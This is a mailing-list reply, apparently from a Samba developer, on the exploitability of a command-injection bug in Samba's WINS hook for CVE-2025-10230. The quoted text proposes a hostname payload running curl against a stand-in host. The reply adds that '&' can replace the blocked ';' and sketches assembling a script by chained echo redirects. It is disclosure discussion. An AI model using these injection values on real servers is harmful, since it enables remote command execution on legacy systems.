Re: Samba security releases for CVE-2025-10230 and CVE-2025-9640

[Douglas Bagnall <douglas.bagnall () catalyst net nz>]

On 16/10/25 12:30, Caveney, Seamus G wrote:

> Illegal characters in a NetBIOS hostname are:
>
> \ / : * ? " < > | ,
>
> notably excluding backticks and semicolons. I'm not deeply familiar
> with the Samba code base but a glance at nbtname.c and winsserver.c
> seems to suggest that those character limitations aren't enforced at
> the protocol level, so it might be possible to use pipes, redirects
> or exec a local binary with a short path. Otherwise, the easiest
> exploitable payload I can think of would be:
>
> ;`curl ab.cd`;

The characters '<', ';', and '>' are blocked by the needs of the ldb
database that this server uses (I am not sure I checked '`', but it is
probably allowed). But of course '&' works just as well as ';'.

If '>' worked, I think you could build up a script with a lot of
"&echo foo>>x&" followed by a `tr`.

> I'd be interested to see if anybody has a living Samba install
> configured as a DC with WINS still running in 2025.

Me too!

The last indication of a 'wins hook' line I have seen was in 2016, and 
that was commented out.

An example of a place that may use it is a factory where some machinery 
is a few decades old and only knows WINS but otherwise still works well.

cheers,
Douglas